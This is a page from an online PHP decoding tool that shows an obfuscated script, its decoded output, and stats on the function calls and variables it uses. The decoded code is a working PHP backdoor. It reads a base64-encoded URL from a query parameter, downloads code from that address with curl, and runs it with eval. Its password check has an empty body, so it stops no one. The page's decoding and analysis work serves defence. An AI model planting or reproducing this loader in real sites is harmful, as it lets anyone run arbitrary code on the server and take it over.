Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $strNX='base64_decode'; $c_init='curl_init'; $c_setopt='curl_setopt'; $c_exec='c..

Decoded Output download

<?php 
$strNX='base64_decode'; 
$c_init='curl_init'; 
$c_setopt='curl_setopt'; 
$c_exec='curl_exec'; 
	if(isset($_GET['u']) && isset($_GET['pw'])){ 
		if(strtoupper(md5($_GET['pw']))!='C613EDAC9ACFC7A8AFD03B7B99364095'){ 
	} 
	$ch=$c_init($strNX($_GET['u'])); 
	$c_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
	$r=$c_exec($ch); 
	eval(''.$r); 
	die; 
} ?>

Did this file decode correctly?

Original Code

<?php
$strNX='base64_decode';
$c_init='curl_init';
$c_setopt='curl_setopt';
$c_exec='curl_exec';
	if(isset($_GET['u']) && isset($_GET['pw'])){
		if(strtoupper(md5($_GET['pw']))!='C613EDAC9ACFC7A8AFD03B7B99364095'){
	}
	$ch=$c_init($strNX($_GET['u']));
	$c_setopt($ch,CURLOPT_RETURNTRANSFER,1);
	$r=$c_exec($ch);
	eval(''.$r);
	die;
}

Function Calls

md5 1
strtoupper 1

Variables

$strNX base64_decode
$c_exec curl_exec
$c_init curl_init
$c_setopt curl_setopt

Stats

MD5 0fd8bbea175c4e408d2c53d2d3187981
Eval Count 0
Decode Time 59 ms